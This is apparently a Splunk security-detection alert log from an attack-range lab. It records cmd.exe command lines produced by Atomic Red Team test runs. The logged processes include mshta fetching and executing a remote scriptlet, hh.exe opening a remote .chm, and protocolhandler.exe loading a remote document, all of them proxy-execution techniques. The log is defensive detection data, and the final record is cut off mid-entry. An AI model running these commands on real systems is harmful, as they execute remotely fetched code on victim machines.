1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:40", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:40", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")\"", process_id="0xc9c", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm\"", process_id="0x1820", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:18", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:18", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm\"", process_id="0x1820", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"hh.exe C:\\AtomicRedTeam\\atomics\\T1218.001\\src\\T1218.001.chm\"", process_id="0xf10", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"hh.exe C:\\AtomicRedTeam\\atomics\\T1218.001\\src\\T1218.001.chm\"", process_id="0xf10", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:34:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:34:04", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b & call \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\"", process_id="0x1ec", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:34:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:34:04", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b & call \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\"", process_id="0x1ec", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:34:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:34:04", original_file_name="Cmd.Exe", parent_process="\"cmd.exe\" /c \"FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b &amp; call \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\"", parent_process_id="492", process="C:\\Windows\\system32\\cmd.exe /c reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH", process_id="4120", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:34:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:34:04", original_file_name="Cmd.Exe", parent_process="\"cmd.exe\" /c \"FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b &amp; call \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx\"\"", parent_process_id="492", process="C:\\Windows\\system32\\cmd.exe /c reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH", process_id="4120", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:42", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"", parent_process_id="4436", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="2384", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:42", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\system32\\mshta.exe\" \"C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"", parent_process_id="4436", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="2384", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", process="\"cmd.exe\" /c \"mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\"", process_id="6688", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", original_file_name="Cmd.Exe", parent_process="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"", parent_process_id="3056", 